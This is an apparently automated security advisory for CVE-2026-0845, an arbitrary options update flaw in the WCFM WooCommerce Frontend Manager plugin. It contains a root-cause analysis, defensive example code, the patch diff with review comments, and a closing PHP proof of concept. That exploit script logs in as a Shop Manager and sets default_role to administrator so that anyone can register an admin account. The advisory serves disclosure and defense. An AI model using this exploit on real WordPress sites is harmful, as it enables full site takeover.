Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-0845: WCFM – WooCommerce Frontend Manager <= 6.7.24 – Authenticated (Shop Manager+) Arbitrary Options Update (wc-frontend-manager)

CVE ID CVE-2026-0845
Severity High (CVSS 7.2)
CWE 862
Vulnerable Version 6.7.24
Patched Version 6.7.25
Disclosed February 8, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-0845:
This vulnerability is an authenticated arbitrary options update flaw in the WCFM – WooCommerce Frontend Manager plugin for WordPress. The vulnerability affects the plugin’s settings processing controller, allowing attackers with Shop Manager or higher privileges to modify arbitrary WordPress site options. The CVSS score of 7.2 reflects the high impact of successful exploitation.

The root cause is a missing capability check in the WCFM_Settings_Controller::processing function. The vulnerable code path begins in wc-frontend-manager/core/class-wcfm-ajax.php at line 296, where the plugin processes AJAX requests for the ‘wcfm_settings_controller’ action. The code includes the settings controller file and instantiates the WCFM_Settings_Controller class without verifying the user has appropriate permissions. The controller’s processing method then executes update_option calls without validating the option keys being modified.

Exploitation requires an authenticated attacker with Shop Manager or higher privileges. The attacker sends a POST request to /wp-admin/admin-ajax.php with the action parameter set to ‘wcfm_settings_controller’. The request includes a wcfm_settings_form parameter containing an array with a wcfm_page_options sub-array. This sub-array contains key-value pairs where the keys are WordPress option names and the values are the desired settings. To escalate privileges, an attacker sets the default_role option to ‘administrator’ and the users_can_register option to ‘1’, enabling administrative user registration.

The patch addresses the vulnerability through multiple changes. In wc-frontend-manager/core/class-wcfm-ajax.php lines 296-304, the patch adds a capability check using current_user_can with the ‘access_wcfm_site_setup’ capability. The patch also restricts which option keys can be updated in wc-frontend-manager/controllers/settings/wcfm-controller-settings.php lines 150-156. The code now filters the wcfm_page_options array against an allowed list of keys using array_intersect_key and array_flip. Only keys present in the wcfm_allowed_page_keys array pass through to update_option calls.
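The two halves of the fix described above (the missing capability gate in the AJAX dispatcher and the unfiltered `update_option` loop in the settings controller) are easiest to see side by side. The following is an added example written for this page, not WCFM's own code: `get_option`, `update_option` and the capability test are replaced by an in-memory stub so it runs from the command line, the request body is constructed to match the shape the analysis describes, and the names `process_page_options_vulnerable`, `process_page_options_hardened`, `handle_settings_request` and `$user_caps` are this example's own. The `absint`-style integer cast on the values is an addition beyond the patch, which only filters keys.

```php
<?php
// Added example (not WCFM's code). In-memory stand-in for the WordPress options table.
$GLOBALS['options'] = [
    'default_role'       => 'subscriber',
    'users_can_register' => '0',
    'wcfm_page_options'  => ['wc_frontend_manager_page_id' => 12],
];

function get_option(string $key, $default = false) {
    return $GLOBALS['options'][$key] ?? $default;
}

function update_option(string $key, $value): void {
    $GLOBALS['options'][$key] = $value;
}

function reset_options(): void {
    $GLOBALS['options']['default_role']       = 'subscriber';
    $GLOBALS['options']['users_can_register'] = '0';
}

// 6.7.24 shape: every submitted key under wcfm_page_options is written to the
// options table as-is, so the request decides which option names get updated.
function process_page_options_vulnerable(array $form): void {
    if (isset($form['wcfm_page_options'])) {
        $page_options = array_merge(get_option('wcfm_page_options', []), $form['wcfm_page_options']);
        foreach ($page_options as $key => $val) {
            update_option($key, $val);
        }
    }
}

// 6.7.25 shape: the merged array is intersected with a fixed allowlist of the
// page-ID keys WCFM actually manages (same array_intersect_key/array_flip idiom as
// the patch). Values are additionally clamped to non-negative integers here,
// since each of these keys holds a page ID.
function process_page_options_hardened(array $form): void {
    if (!isset($form['wcfm_page_options']) || !is_array($form['wcfm_page_options'])) {
        return;
    }
    $allowed = [
        'wc_frontend_manager_page_id',
        'wcfm_vendor_membership_page_id',
        'wcfm_vendor_registration_page_id',
        'wcfm_affiliate_registration_page_id',
    ];
    $page_options = array_merge(get_option('wcfm_page_options', []), $form['wcfm_page_options']);
    $page_options = array_intersect_key($page_options, array_flip($allowed));
    foreach ($page_options as $key => $val) {
        update_option($key, max(0, (int) $val));
    }
}

// Stand-in for the capability gate added to class-wcfm-ajax.php: the request is
// refused unless the caller holds access_wcfm_site_setup. $user_caps is a
// constructed list of the caller's capabilities.
function handle_settings_request(array $form, array $user_caps): string {
    if (!in_array('access_wcfm_site_setup', $user_caps, true)) {
        return 'denied';
    }
    process_page_options_hardened($form);
    return 'ok';
}

// Constructed request body shaped like the one the advisory describes.
$submitted = [
    'wcfm_page_options' => [
        'default_role'                => 'administrator',
        'users_can_register'          => '1',
        'wc_frontend_manager_page_id' => '15',
    ],
];

process_page_options_vulnerable($submitted);
printf("vulnerable: default_role=%s users_can_register=%s\n",
    get_option('default_role'), get_option('users_can_register'));

reset_options();
// A shop-manager-like caller without the site-setup capability is refused outright.
printf("hardened, no capability: %s\n", handle_settings_request($submitted, ['manage_woocommerce']));

// A permitted caller only reaches the allowlisted key; default_role and
// users_can_register are dropped before any update_option call.
printf("hardened, with capability: %s\n", handle_settings_request($submitted, ['access_wcfm_site_setup']));
printf("hardened: default_role=%s users_can_register=%s page_id=%d\n",
    get_option('default_role'), get_option('users_can_register'), get_option('wc_frontend_manager_page_id'));
```

Run with `php example.php`. The vulnerable run ends with `default_role=administrator`; the hardened run leaves both core options untouched and writes only `wc_frontend_manager_page_id`. The allowlist is the control that actually closes the bug class: a capability check alone still lets any holder of `access_wcfm_site_setup` write arbitrary options, which is why the patch does both.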

Successful exploitation enables complete site compromise. Attackers can modify any WordPress option, including those controlling user registration, default user roles, authentication methods, and site configuration. The most direct attack path changes the default registration role to administrator and enables user registration, allowing attackers to create administrative accounts. This leads to full privilege escalation and administrative control over the WordPress installation.
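Because the impact hinges on a handful of core options (`default_role`, `users_can_register` and similar), a site can add a compensating control that survives the next plugin bug of this kind. The following must-use plugin is an added example written for this page, not part of WCFM or WordPress core; it assumes a running WordPress install (it uses the real `pre_update_option_{$option}` and `updated_option` hooks), and the name `SOG_GUARDED_OPTIONS` and the log prefix `sensitive-option-guard` are this example's own.

```php
<?php
/**
 * Plugin Name: Sensitive Option Guard (added example, not part of WCFM)
 *
 * Place in wp-content/mu-plugins/. Two layers:
 *  1. pre_update_option_{$option} refuses changes to high-impact options unless the
 *     current user holds manage_options, by returning the old value (WordPress skips
 *     the write when old and new values are identical).
 *  2. updated_option records any change that does go through, so a tampered
 *     registration policy shows up in the PHP error log with the acting user.
 */

const SOG_GUARDED_OPTIONS = ['default_role', 'users_can_register', 'admin_email', 'siteurl', 'home'];

foreach (SOG_GUARDED_OPTIONS as $sog_option) {
    add_filter("pre_update_option_{$sog_option}", function ($value, $old_value, $option) {
        // WP-CLI runs without a logged-in user; let `wp option update` through so
        // legitimate administration from the shell is not blocked.
        if (defined('WP_CLI') && WP_CLI) {
            return $value;
        }
        if (current_user_can('manage_options')) {
            return $value;
        }
        error_log(sprintf(
            'sensitive-option-guard: blocked update of %s by user %d (action=%s)',
            $option,
            get_current_user_id(),
            isset($_REQUEST['action']) ? sanitize_key($_REQUEST['action']) : 'none'
        ));
        return $old_value; // unchanged value => update_option() performs no write
    }, 10, 3);
}

add_action('updated_option', function ($option, $old_value, $value) {
    if (!in_array($option, SOG_GUARDED_OPTIONS, true)) {
        return;
    }
    error_log(sprintf(
        'sensitive-option-guard: %s changed from %s to %s by user %d',
        $option,
        wp_json_encode($old_value),
        wp_json_encode($value),
        get_current_user_id()
    ));
}, 10, 3);
```

The filter layer stops an authenticated Shop Manager from flipping `default_role` through any plugin code path that ends in `update_option`, since the core function consults `pre_update_option_{$option}` before writing. The log layer is what a detection rule or SIEM can alert on: an `updated_option` entry for `default_role` or `users_can_register` from a request whose `action` is a plugin AJAX endpoint rather than `options-general.php` is a strong indicator worth investigating. Neither layer replaces upgrading to 6.7.25.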

Differential between vulnerable and patched code

Code Diff
--- a/wc-frontend-manager/controllers/messages/wcfm-controller-messages.php
+++ b/wc-frontend-manager/controllers/messages/wcfm-controller-messages.php
@@ -233,11 +233,26 @@
 				}

 				if( $message_status != 'unread' ) { $actions = ''; }
-				if( !wcfm_is_vendor() && ( $message_status == 'unread' ) && ( in_array( $wcfm_message->message_type, array( 'verification', 'vendor_approval', 'affiliate_approval' ) ) ) ) {
-
-				} else {
+
+				$resource_owner_id = $wcfm_message->author_id;
+				if($wcfm_message->message_to > 0) {
+					$resource_owner_id = $wcfm_message->message_to;
+				}
+				if($resource_owner_id < 0) $resource_owner_id = 0;
+
+				$is_allowed = wcfm_user_can_perform_request(
+					(int) $resource_owner_id,
+					'message_delete'
+				);
+				if( $is_allowed ) {
 					$actions .= '<a class="wcfm_messages_delete wcfm-action-icon" href="#" data-messageid="' . $wcfm_message->ID . '"><span class="wcfmfa fa-trash-alt text_tip" data-tip="' . esc_attr__( 'Delete', 'wc-frontend-manager' ) . '"></span></a>';
 				}
+
+				// if( !wcfm_is_vendor() && ( $message_status == 'unread' ) && ( in_array( $wcfm_message->message_type, array( 'verification', 'vendor_approval', 'affiliate_approval' ) ) ) ) {
+
+				// } else {
+				// 	$actions .= '<a class="wcfm_messages_delete wcfm-action-icon" href="#" data-messageid="' . $wcfm_message->ID . '"><span class="wcfmfa fa-trash-alt text_tip" data-tip="' . esc_attr__( 'Delete', 'wc-frontend-manager' ) . '"></span></a>';
+				// }

 				/*if( $wcfm_is_allow_pdf_invoice = apply_filters( 'wcfm_is_allow_pdf_invoice', true ) ) {
 					if( WCFM_Dependencies::wcfmu_plugin_active_check() && WCFM_Dependencies::wcfm_wc_pdf_invoices_packing_slips_plugin_active_check() ) {
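Review bot: the replaced branch survives as a commented-out block (the `//` lines after the new `if( $is_allowed )` block) instead of being deleted; version control already preserves it, so drop those lines to keep the action-building code readable. The owner resolution also deserves a one-line comment: `$resource_owner_id` falls back to `author_id` only when `message_to` is not positive, so a message with `message_to` of 0 is treated as owned by its author, and the `< 0` clamp to 0 then means "no owner". Stating that intent next to the code will stop the next reader from reading it as a bug.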
--- a/wc-frontend-manager/controllers/settings/wcfm-controller-settings.php
+++ b/wc-frontend-manager/controllers/settings/wcfm-controller-settings.php
@@ -150,6 +150,8 @@
 		if( isset( $wcfm_settings_form['wcfm_page_options'] ) ) {
 			$wcfm_page_options = get_option("wcfm_page_options", array());
 			$wcfm_page_options = array_merge( $wcfm_page_options, $wcfm_settings_form['wcfm_page_options'] );
+			$wcfm_allowed_page_keys = apply_filters( 'wcfm_allowed_page_keys', array('wc_frontend_manager_page_id', 'wcfm_vendor_membership_page_id', 'wcfm_vendor_registration_page_id', 'wcfm_affiliate_registration_page_id') );
+			$wcfm_page_options = array_intersect_key( $wcfm_page_options, array_flip( $wcfm_allowed_page_keys ) );
 			foreach( $wcfm_page_options as $wcfm_page_option_key => $wcfm_page_option_val ) {
 				update_option( $wcfm_page_option_key, $wcfm_page_option_val );
 			}
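Review bot: the allowlist is applied after the merge with the stored `wcfm_page_options`, so any key previously persisted in that option but absent from `wcfm_allowed_page_keys` is no longer written by this loop; that is the intended effect, but it is a behaviour change that belongs in the changelog. Because the list goes through `apply_filters( 'wcfm_allowed_page_keys', ... )`, any other plugin can widen it back to arbitrary option names; document that callbacks must only ever return WCFM page-ID keys. The values still reach `update_option` unvalidated; every key in the list holds a page ID, so wrapping `$wcfm_page_option_val` in `absint()` would close the remaining gap.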
--- a/wc-frontend-manager/core/class-wcfm-ajax.php
+++ b/wc-frontend-manager/core/class-wcfm-ajax.php
@@ -296,6 +296,10 @@
 						elseif( $WCFM->is_marketplace == 'dokan' ) new WCFM_Settings_Dokan_Controller();
 						elseif( $WCFM->is_marketplace == 'wcfmmarketplace' ) new WCFM_Settings_Marketplace_Controller();
 					} else {
+						if(!current_user_can( apply_filters( 'wcfm_setup_page_required_capability', 'access_wcfm_site_setup' ) ) && !( function_exists('wcfm_is_manager') && wcfm_is_manager() && function_exists('wcfm_is_group_manager') && ! wcfm_is_group_manager() )) {
+							wp_send_json_error( esc_html__( 'You don’t have permission to do this.', 'woocommerce' ) );
+							wp_die();
+						}
 						include_once( $this->controllers_path . 'settings/wcfm-controller-settings.php' );
 						new WCFM_Settings_Controller();
 					}
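Review bot: the new guard's condition is hard to review on one line; splitting the capability test and the manager exception (`wcfm_is_manager()` but not `wcfm_is_group_manager()`) into two named variables, or routing it through the `wcfm_user_can_perform_request` helper introduced in this same patch, would make the intent checkable. The error string is registered under the `woocommerce` text domain while this plugin's Text Domain is `wc-frontend-manager`, so the message will not be picked up by the plugin's own translations; use the plugin's domain.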
--- a/wc-frontend-manager/core/class-wcfm-notification.php
+++ b/wc-frontend-manager/core/class-wcfm-notification.php
@@ -1070,8 +1070,45 @@
   		wp_send_json_error( esc_html__( 'You don’t have permission to do this.', 'woocommerce' ) );
 			wp_die();
 		}
+
+	if( (!apply_filters( 'wcfm_is_pref_notification', true ) || !apply_filters( 'wcfm_is_allow_notifications', true ) ) && ( !apply_filters( 'wcfm_is_allow_direct_message', true ) || !apply_filters( 'wcfm_is_pref_direct_message', true ) ) ) {
+		wp_send_json_error( esc_html__( 'You don’t have permission to do this.', 'woocommerce' ) );
+		wp_die();
+	}

-  	$messageid = absint( $_POST['messageid'] );
+  	$messageid = isset( $_POST['messageid'] ) ? absint( $_POST['messageid'] ) : 0;
+
+	if ( !$messageid ) {
+		wp_send_json_error( esc_html__( 'You don’t have permission to do this.', 'woocommerce' ) );
+		wp_die();
+	}
+
+	$message_data = $wpdb->get_row( $wpdb->prepare(
+		"SELECT author_id, message_to, author_is_admin, author_is_vendor FROM {$wpdb->prefix}wcfm_messages WHERE ID = %d",
+		$messageid
+	) );
+
+	if ( !$message_data ) {
+		wp_send_json_error( esc_html__( 'You don’t have permission to do this.', 'woocommerce' ) );
+		wp_die();
+	}
+
+	$resource_owner_id = $message_data->author_id;
+	if($message_data->message_to > 0) {
+		$resource_owner_id = $message_data->message_to;
+	}
+	if($resource_owner_id < 0) $resource_owner_id = 0;
+
+	$is_allowed = wcfm_user_can_perform_request(
+		(int) $resource_owner_id,
+		'message_delete'
+	);
+
+	if ( ! $is_allowed ) {
+		wp_send_json_error( esc_html__( 'You don’t have permission to do this.', 'woocommerce' ) );
+		wp_die();
+	}
+
   	$wpdb->query( $wpdb->prepare( "DELETE FROM {$wpdb->prefix}wcfm_messages WHERE `ID` = %d", $messageid ) );
   	$wpdb->query( $wpdb->prepare( "DELETE FROM {$wpdb->prefix}wcfm_messages_modifier WHERE `message` = %d", $messageid ) );

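Review bot: a missing or zero `messageid` now yields the same "You don't have permission" error as a genuine authorization failure, which makes support and log triage harder; return a distinct invalid-request error for the parameter check. The same denial block is built five times in this hunk; a small local helper wrapping `wp_send_json_error` and `wp_die` would remove the duplication. The ownership lookup (`author_id` unless `message_to > 0`, clamped at 0) is copied verbatim from the messages controller and is a candidate to move into the shared `wcfm_user_can_perform_request` helper rather than being repeated per call site. Finally, the `SELECT` fetches `author_is_admin` and `author_is_vendor`, but neither column is used below; trim the column list.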
--- a/wc-frontend-manager/helpers/wcfm-core-functions.php
+++ b/wc-frontend-manager/helpers/wcfm-core-functions.php
@@ -2391,4 +2391,33 @@
 	}
 	return $locale;
 });*/
-?>
 No newline at end of file
+if(!function_exists('wcfm_user_can_perform_request')) {
+	function wcfm_user_can_perform_request( $resource_vendor_id, $resource_type='', $resource_subtype='' ) {
+		$user_id = apply_filters('wcfm_current_vendor_id', get_current_user_id());
+		$has_capability = apply_filters( 'wcfm_current_user_can', true, $user_id, $resource_vendor_id, $resource_type, $resource_subtype );
+		if ( ! $has_capability ) {
+			return false;
+		}
+		if ( user_can( $user_id, 'administrator' ) ) {
+			return true;
+		}
+		if ( wcfm_is_vendor( $user_id ) && (int) $user_id === (int) $resource_vendor_id ) {
+			return true;
+		}
+		if ( function_exists('wcfm_is_manager') && wcfm_is_manager( $user_id ) ) {
+			if ( function_exists('wcfm_is_group_manager') && !wcfm_is_group_manager( $user_id ) ) {
+				return true;
+			}
+			if($resource_vendor_id) {
+				$group_list = array_filter((array) get_user_meta( $user_id, '_wcfm_vendor_group', true ));
+				foreach ( $group_list as $group_id ) {
+					$group_vendors = (array) get_post_meta( $group_id, '_group_vendors', true );
+					if ( in_array( $resource_vendor_id, $group_vendors ) ) {
+						return true;
+					}
+				}
+			}
+		}
+		return false;
+	}
+}
 No newline at end of file
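Review bot: `user_can( $user_id, 'administrator' )` relies on role names being registered as capabilities, which WordPress does for built-in roles but which custom role setups need not preserve; checking a real capability such as `manage_options` is the conventional form. `in_array( $resource_vendor_id, $group_vendors )` is a loose comparison while `$resource_vendor_id` is an int and `_group_vendors` meta may hold strings; cast the meta values to int and pass `true` as the third argument. The `wcfm_current_user_can` filter short-circuits only when it returns false, so a callback can revoke access but never grant it; state that in the function's docblock, which is currently missing. The file also still ends without a trailing newline, as the diff marker shows.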
--- a/wc-frontend-manager/wc_frontend_manager.php
+++ b/wc-frontend-manager/wc_frontend_manager.php
@@ -4,14 +4,14 @@
  * Plugin URI: https://wclovers.com
  * Description: WooCommerce is really Easy and Beautiful. We are here to make your life much more Easier and Peaceful.
  * Author: WC Lovers
- * Version: 6.7.24
+ * Version: 6.7.25
  * Author URI: https://wclovers.com
  *
  * Text Domain: wc-frontend-manager
  * Domain Path: /lang/
  *
  * WC requires at least: 3.0.0
- * WC tested up to: 10.4
+ * WC tested up to: 10.5
  *
  */

--- a/wc-frontend-manager/wc_frontend_manager_config.php
+++ b/wc-frontend-manager/wc_frontend_manager_config.php
@@ -4,7 +4,7 @@

 define('WCFM_TEXT_DOMAIN', 'wc-frontend-manager');

-define('WCFM_VERSION', '6.7.24');
+define('WCFM_VERSION', '6.7.25');

 define('WCFM_SERVER_URL', 'https://wclovers.com');

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-0845 - WCFM - WooCommerce Frontend Manager <= 6.7.24 - Authenticated (Shop Manager+) Arbitrary Options Update

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';
$username = 'shop_manager_user';
$password = 'shop_manager_password';

// Step 1: Authenticate to obtain WordPress cookies
$login_url = str_replace('/wp-admin/admin-ajax.php', '/wp-login.php', $target_url);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url,
    'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Step 2: Exploit the vulnerability to enable admin registration
$exploit_payload = [
    'action' => 'wcfm_settings_controller',
    'wcfm_settings_form' => [
        'wcfm_page_options' => [
            'default_role' => 'administrator',          // Set default user role to administrator
            'users_can_register' => '1'                // Enable user registration
        ]
    ]
];

curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_payload));
$response = curl_exec($ch);

// Step 3: Verify the exploit succeeded by checking if registration is enabled
$options_check_url = str_replace('/wp-admin/admin-ajax.php', '/wp-admin/options-general.php', $target_url);
curl_setopt($ch, CURLOPT_URL, $options_check_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

if (strpos($response, 'Membership: Anyone can register') !== false &&
    strpos($response, 'checked="checked"') !== false) {
    echo "Exploit successful: User registration enabled with admin default role.\n";
    echo "Attackers can now register new accounts with administrative privileges.\n";
} else {
    echo "Exploit may have failed. Check response.\n";
}

curl_close($ch);

?>
